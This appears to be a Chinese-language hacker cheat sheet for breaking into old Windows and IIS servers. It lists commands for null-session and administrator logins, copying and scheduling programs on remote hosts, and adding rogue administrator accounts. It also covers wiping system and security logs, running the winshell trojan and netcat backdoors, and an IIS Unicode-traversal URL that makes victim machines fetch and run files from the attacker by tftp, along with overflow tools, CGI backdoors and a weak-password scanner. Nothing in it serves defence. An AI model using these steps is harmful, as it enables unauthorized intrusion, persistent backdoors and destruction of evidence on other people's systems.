常用的幾條
NET
命令:
==================================================
(與遠程主機建立空管連接)
net use \\IP
地址
\ipc$ "" /use:""
(以管理員身份登錄遠程主機)
net use \\IP
地址
\ipc$ "
密碼
" /use:"Administrator"
(傳送文件到遠程主機
WINNT
目錄下)
copy
本機目錄路徑
\
程序
\\IP
地址
\admin$
(查看遠程主機時間)
net time \\IP
地址
(定時啟動某個程序)
at \\IP
地址
02:18 readme.exe
(查看共享)
net view \\IP
地址
(查看
netbios
工作組列表)
nbtstat -A IP
地址
(將遠程主機
C
盤映射為自己的
F
盤)
net use f: \\IP
地址
\c$ ""/user:"Administrator"
(這兩條把自己增加到管理員組):
net user
用戶名
密碼
/add net localgroup Administrators
用戶名
/add
(斷開連接)
net use \\IP
地址
\ipc$ /delete
擦屁屁:
del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log
一、
netsvc.exe
下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:
netsvc /list \\IP
地址
netsvc schedule \\IP
地址
/query netsvc \\IP
地址
schedule /start
二、
OpenTelnet.exe
遠程啟動主機的
Telnet
服務,并綁定端口到
7878
,例如:
OpenTelnet \\IP
地址
用戶名
密碼
1 7878
然后就可以
telnet
到主機的
7878
端口,進入
DOS
方式下:
telnet IP
地址
7878
三、
winshell.exe
一個非常小的木馬(不到
6K
),
telnet
到主機的
7878
端口,輸入密碼
winshell
,當看到
CMD>
后,可打下面的命令:
p Path
(查看
winshell
主程序的路徑信息)
b reBoot
(重新啟動機器)
d shutDown
(關閉機器)
s Shell
(執行后你就會看到可愛的
“C:\>
”)
x eXit
(退出本次登錄會話,此命令并不終止
winshell
的運行)
CMD>
http://.../srv.exe
(通過
http
下載其他網站上的文件到運行
winshell
的機器上)
四、
3389
登陸器,
GUI
方式登錄遠程主機的
五、
elsave.exe
事件日志清除工具
elsave -s \\IP
地址
-l "application" -C elsave -s \\IP
地址
-l "system" -C elsave -s \\IP
地址
-l "security" -C
執行后成功清除應用程序日志,系統日志,安全日志
六、
hbulot.exe
開啟
win2kserver
和
winxp
的
3389
服務
hbulot [/r]
使用
/r
表示安裝完成后自動重起目標使設置生效。
七、
nc.exe(netcat.exe)
一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。
想要連接到某處
: nc [-options] hostname port[s] [ports] ...
綁定端口等待連接
: nc -l -p port [-options] [hostname] [port]
參數
: -e prog
程序重定向,一旦連接,就執行
[
危險
!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h
幫助信息
-i secs
延時的間隔
-l
監聽模式,用于入站連接
-n
指定數字的
IP
地址,不能用
hostname -o file
記錄
16
進制的傳輸
-p port
本地端口號
-r
任意指定本地及遠程端口
-s addr
本地源地址
-u UDP
模式
-v
詳細輸出
——
用兩個
-v
可得到更詳細的內容
-w secs timeout
的時間
-z
將輸入輸出關掉
——
用于掃描時
八、
TFTPD32.EXE
把自己的電腦臨時變為一臺
FTP
服務器,讓肉雞來下載文件,
tftp
命令要在肉雞上執行,通常要利用
Unicode
漏洞或
telnet
到肉雞,例如:
http://IP
地址
/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i
本機
IP
地址
get
文件名
c:\winnt\system32\
文件名
然后可以直接令文件運行:
http://IP
地址
/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+
文件名
九、
prihack.exe
是
IIS
的
printer
遠程緩沖區溢出工具。
idqover.exe
是溢出
idq
的,選擇
“
溢出后在一個端口監聽
”
,然后用
telnet
連接它的監聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執行。
xploit.exe
是一個圖形界面的
ida
溢出,成功以后
winxp
下需要打
winxp
。
一○、
ntis.exe
、
cmd.exe
和
cmdasp.asp
是三個
cgi-backdoor
,
exe
要放到
cgi-bin
目錄下,
asp
放到有
ASP
執行權限的目錄。然后用
IE
瀏覽器連接。
一、一
Xscan
命令行運行參數說明:
在檢測過程中,按
"[
空格
]"
鍵可以查看各線程狀態及掃描進度,按
"q"
鍵保存當前數據后提前退出程序,按
"<ctrl+c>"
強行關閉程序。
1.
命令格式
: xscan -host <
起始
IP>[-<
終止
IP>] <
檢測項目
> [
其他選項
] xscan -file <
主機列表文件名
> <
檢測項目
> [
其他選項
]
其中
<
檢測項目
>
含義如下
: -port :
檢測常用服務的端口狀態
(
可通過
\dat\config.ini
文件的
"PORT-SCAN-OPTIONS\PORT-LIST"
項定制待檢測端口列表
)
;
-ftp :
檢測
FTP
弱口令
(
可通過
\dat\config.ini
文件設置用戶名
/
密碼字典文件
)
;
-ntpass :
檢測
NT-Server
弱口令
(
可通過
\dat\config.ini
文件設置用戶名
/
密碼字典文件
)
;
-cgi :
檢測
CGI
漏洞
(
可通過
\dat\config.ini
文件的
"CGI-ENCODE\encode_type"
項設置編碼方案
)
;
-iis :
檢測
IIS
漏洞
(
可通過
\dat\config.ini
文件的
"CGI-ENCODE\encode_type"
項設置編碼方案
)
;
[
其他選項
]
含義如下
: -v:
顯示詳細掃描進度
-p:
跳過
Ping
不通的主機
-o:
跳過沒有檢測到開放端口的主機
-t <
并發線程數量
[,
并發主機數量
]>:
指定最大并發線程數量和并發主機數量
,
默認數量為
100,10
|